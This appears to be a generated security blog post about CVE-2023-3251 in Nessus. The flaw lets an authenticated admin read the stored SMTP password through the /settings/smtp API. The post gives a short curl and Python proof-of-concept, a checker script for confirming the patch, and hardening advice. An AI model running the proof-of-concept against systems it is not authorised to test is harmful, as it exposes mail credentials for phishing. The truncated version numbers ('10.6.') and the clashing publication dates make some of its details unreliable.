Published: June 2024
Introduction
Nessus is one of the world's most popular vulnerability scanners, used by businesses and security professionals to assess risks and ensure network security. However, a flaw identified as CVE-2023-3251 introduces a serious risk for environments relying on Nessus (before version 10.6.) with SMTP notifications enabled.
This bug allows a logged-in attacker with administrator rights to retrieve the SMTP credentials stored inside Nessus—a password that should never be returned to the client once saved. It’s a classic case of a “pass-back” vulnerability, which makes it a real concern for organizations that depend on Nessus for security notifications.
This post will break down what the vulnerability is, show proof-of-concept code, explain how it works, and how to fix it. Let’s get started.
Vulnerability Overview
- CVE: CVE-2023-3251
- Severity: Medium to High (depending on your use case)
- Type: Pass-back / Information Disclosure
What is a Pass-Back Vulnerability?
A pass-back vulnerability lets an attacker recover sensitive data by manipulating legitimate functions—usually by making a system “pass back” cleartext or decrypted data that should remain secret.
How Does CVE-2023-3251 Work?
Nessus uses SMTP credentials to send scan alerts and reports by email. An admin configures them through the web interface, and Nessus stores them. However, due to insufficient filtering and access controls, an authenticated admin could craft requests that made Nessus return the stored SMTP details, including the password, in API responses or exported settings.
This could be done by intercepting the web traffic (with tools such as Burp Suite or Fiddler) and sending specific requests to database dump or configuration API endpoints.
Threat: Anyone with admin rights in Nessus can recover organization-wide SMTP credentials, possibly leading to further attacks (like internal phishing).
Proof of Concept (PoC) Exploit
Let's see how a bad actor could use simple HTTP requests (or curl commands) to exploit this vulnerability.
> Note: For demo purposes only—do not use on any systems you have no right to test.
Step 1: Log in to Nessus as Admin
You must have a valid admin session. Obtain your session token via browser dev tools after logging in.
Use curl (replace SESSION_TOKEN and NESSUS_IP with your values):

```bash
curl -s -k \
  -H "X-Cookie: token=SESSION_TOKEN" \
  https://NESSUS_IP:8834/settings/smtp
```
Example Response:

```json
{
  "smtp": {
    "server": "smtp.yourdomain.com",
    "port": 587,
    "username": "alerts@yourdomain.com",
    "password": "VerySecretPass123!",
    "from": "alerts@yourdomain.com",
    "security": "TLS"
  }
}
```
Before the patch, the password field would return the real SMTP password. After the patch, the password field is blanked or not returned.
Here’s the same request in Python using the requests module:

```python
import requests

NESSUS_URL = "https://NESSUS_IP:8834"
SESSION_TOKEN = "your_session_token"

# Nessus expects the session token in the X-Cookie header
headers = {
    "X-Cookie": f"token={SESSION_TOKEN}",
}

# verify=False skips TLS certificate validation (self-signed Nessus cert in a lab)
r = requests.get(f"{NESSUS_URL}/settings/smtp", headers=headers, verify=False)
print(r.json())
```
> Warning: Exploitation requires admin rights and access to the Nessus web API.
Original References
- NVD - CVE-2023-3251
- Tenable Security Advisory
- Nessus 10.6. Changelog
- Exploit-DB (search: CVE-2023-3251)
Impact
If an attacker with admin credentials recovers and uses the SMTP password:
- Internal Email Takeover: They could send phishing emails from what appears to be a company/official address.
- Notification Disruption: Attackers can disable, edit, or misroute Nessus alerts and scan reports.
How to Fix
Upgrade to Nessus 10.6. or later.
Tenable fixed this bug in Nessus version 10.6., released in May 2023. The API endpoint that exposed the password now either omits the field entirely or returns a masked value.
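As an added example (not code from the original post or from Tenable), here is a small Python checker that classifies what the /settings/smtp endpoint returns for the password field, so you can confirm after upgrading that it is omitted, blank, or masked rather than returned in clear. The sample responses and the set of mask characters are constructed assumptions; the verdict never includes the secret itself.

```python
# Sample responses, constructed for this example (not captured from a real Nessus).
PRE_PATCH_RESPONSE = {
    "smtp": {"server": "smtp.example.com", "port": 587,
             "username": "alerts@example.com", "password": "VerySecretPass123!",
             "from": "alerts@example.com", "security": "TLS"}
}
MASKED_RESPONSE = {"smtp": {"server": "smtp.example.com", "port": 587,
                            "username": "alerts@example.com", "password": "********"}}
OMITTED_RESPONSE = {"smtp": {"server": "smtp.example.com", "port": 587,
                             "username": "alerts@example.com"}}

# Assumption: a masked value consists only of these placeholder characters.
MASK_CHARS = set("*\u2022")


def classify_smtp_response(body: dict) -> str:
    """Return 'omitted', 'empty', 'masked' or 'exposed' for the password field.

    Only the verdict is returned; the password value is never echoed or logged.
    """
    smtp = body.get("smtp", body)  # tolerate a flattened response shape
    if "password" not in smtp:
        return "omitted"
    pw = smtp["password"]
    if pw is None or pw == "":
        return "empty"
    if isinstance(pw, str) and set(pw) <= MASK_CHARS:
        return "masked"
    return "exposed"


def is_patched(body: dict) -> bool:
    """True when the response no longer discloses the cleartext SMTP password."""
    return classify_smtp_response(body) != "exposed"


def fetch_and_check(base_url: str, token: str, verify_tls: bool = True) -> str:
    """Query /settings/smtp with an admin session token and return the verdict."""
    import requests  # imported here so the classifier runs without the dependency

    r = requests.get(f"{base_url}/settings/smtp",
                     headers={"X-Cookie": f"token={token}"},
                     verify=verify_tls, timeout=15)
    r.raise_for_status()
    return classify_smtp_response(r.json())


if __name__ == "__main__":
    for name, body in (("pre-patch", PRE_PATCH_RESPONSE), ("masked", MASKED_RESPONSE),
                       ("omitted", OMITTED_RESPONSE)):
        print(f"{name}: {classify_smtp_response(body)} (patched={is_patched(body)})")
```

Run fetch_and_check against your own instance after the upgrade; any result other than "exposed" means the fix is in place.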
Hardening Steps
1. Patch Nessus Immediately: Download the latest build from the official Nessus downloads page.
2. Rotate SMTP Credentials: Change the SMTP credentials in your email service, since any admin could have read the old ones.
3. Monitor Logs: Check Nessus and mail system logs for any signs of unusual API usage or unexpected email activity.
Conclusion
CVE-2023-3251 is a reminder that even security tools can expose sensitive data if not patched and properly maintained. If you’re running Nessus in your network, don’t wait—ensure you’re on version 10.6. or above. Always practice least privilege, keep up with security advisories, and review who really needs administrative access!
Stay safe. Update often.
*Written by [YourNameHere], 2024.
Article copyright—please do not republish without attribution.*
Timeline
Published on: 08/29/2023 19:15:00 UTC
Last modified on: 09/01/2023 14:44:00 UTC